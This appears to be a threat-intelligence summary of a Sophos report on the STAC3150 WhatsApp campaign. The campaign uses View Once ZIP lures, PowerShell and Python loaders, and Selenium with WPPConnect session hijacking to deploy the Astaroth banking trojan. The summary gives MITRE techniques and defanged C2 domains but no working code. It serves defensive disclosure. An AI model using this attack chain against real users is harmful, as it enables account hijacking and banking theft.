Threat Research

WhatsApp compromise leads to Astaroth deployment

Sophos
WhatsApp compromise leads to Astaroth deployment

Sophos analysts uncovered a multi-stage WhatsApp-focused campaign (STAC3150) delivering archive attachments that deploy downloaders which fetch scripts to harvest WhatsApp session data and, in later stages, an MSI installer that installs the Astaroth (Guildma) banking trojan. The campaign used View Once messages, PowerShell and Python loaders, Selenium with WPPConnect to hijack WhatsApp Web, and actor-controlled domains such as varegjopeaks[.]com and manoelimoveiscaioba[.]com. #Astaroth #STAC3150

Keypoints

  • Campaign STAC3150 first observed on September 24, 2025, uses WhatsApp “View Once” messages delivering ZIP archives with malicious VBS or HTA files.
  • Initial downloader files launch PowerShell to retrieve second-stage payloads; early delivery used IMAP from attacker email, later shifted to HTTP via Invoke-WebRequest.
  • Second-stage payloads include PowerShell or Python scripts that use Selenium Chrome WebDriver and WPPConnect to hijack WhatsApp Web sessions and harvest contacts and session tokens.
  • In late October the campaign added an MSI installer (installer.msi) that drops Astaroth (Guildma) via a malicious AutoIt script masquerading as a .log file and creates persistence via a startup registry key.
  • Observed C2 infrastructure includes domains such as varegjopeaks[.]com (first-stage) and manoelimoveiscaioba[.]com (Astaroth C2), plus several other actor-controlled domains.
  • Sophos observed impacts to more than 250 customer devices, ~95% located in Brazil, with additional victims in other Latin American countries, the U.S., and Austria.
  • SophosLabs published detections for initial VBS/HTA downloaders, second-stage VBS/MSI files, AutoIt payloads, and provided IOCs for network/blocking/monitoring.

MITRE Techniques

  • [T1566 ] Phishing – Attackers delivered malicious ZIP attachments via WhatsApp “View Once” messages to lure victims into executing archived VBS/HTA files. Quote: ‘The attacks start with a message that is sent using the WhatsApp “View Once” option.’
  • [T1204 ] User Execution – Victims must open and execute the malicious VBS/HTA from the archive, which then launches PowerShell to retrieve additional payloads. Quote: ‘The lure delivers a ZIP archive that contains a malicious VBS or HTA file. When executed, this malicious file launches PowerShell to retrieve second-stage payloads.’
  • [T1059.001 ] PowerShell – Malicious VBS/HTA files launch PowerShell commands (including Invoke-WebRequest) to download second-stage payloads from attacker-controlled servers. Quote: ‘the campaign shifted to HTTP-based communication, leveraging PowerShell’s Invoke-WebRequest command to contact a remote command and control (C2) server hosted on…’
  • [T1105 ] Ingress Tool Transfer – Downloaded second-stage components include PowerShell/Python scripts and an MSI installer that transfer tools like Selenium WebDriver, WPPConnect libraries, and the Astaroth payload to the host. Quote: ‘The downloaded second-stage PowerShell or Python script… uses the Selenium Chrome WebDriver and the WPPConnect JavaScript library…’
  • [T1560 ] Archive Collected Data / Hidden Files and Directories – The MSI installer writes files to disk and uses a malicious AutoIt script masquerading as a .log file to execute Astaroth, hiding payload execution. Quote: ‘The installer file writes files to disk and creates a startup registry key…it launches the Astaroth malware via a malicious AutoIt script that masquerades as a .log file.’
  • [T1098 ] Account Manipulation / Valid Accounts – Scripts harvest WhatsApp contact information and session tokens by hijacking WhatsApp Web sessions, enabling abuse of valid sessions for further distribution. Quote: ‘…harvest contact information and session tokens, and facilitate spam distribution.’
  • [T1547.001 ] Registry Run Keys / Startup Folder – The installer creates a startup registry key to maintain persistence for the Astaroth payload. Quote: ‘The installer file… creates a startup registry key to maintain persistence.’
  • [T1071.001 ] Web Protocols – Actors used HTTP(S) (Invoke-WebRequest to https://www.varegjopeaks[.]com) and IMAP for payload retrieval and C2 communication. Quote: ‘PowerShell being used to retrieve the second-stage payloads via IMAP…the campaign shifted to HTTP-based communication…contact a remote command and control (C2) server hosted on https://www.varegjopeaks[.]com.’

Indicators of Compromise

  • [Domain ] C2 infrastructure used by STAC3150 and Astaroth campaigns – varegjopeaks[.]com, manoelimoveiscaioba[.]com
  • [Domain ] Additional actor-controlled domains observed as C2 or hosting payloads – docsmoonstudioclayworks[.]online, shopeeship[.]com (and 4 more domains)
  • [File name ] MSI installer used to deliver Astaroth – installer.msi
  • [File name ] Malicious scripts and droppers used in initial stages – VBS/HTA dropper files (examples: VBS downloader, HTA script) and AutoIt payload masquerading as a .log file
  • [Technique/Artifact ] WhatsApp session artifacts and harvested tokens – harvested contact information and session tokens via Selenium + WPPConnect (no explicit token strings published)

Read more: https://news.sophos.com/en-us/2025/11/20/whatsapp-compromise-leads-to-astaroth-deployment/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint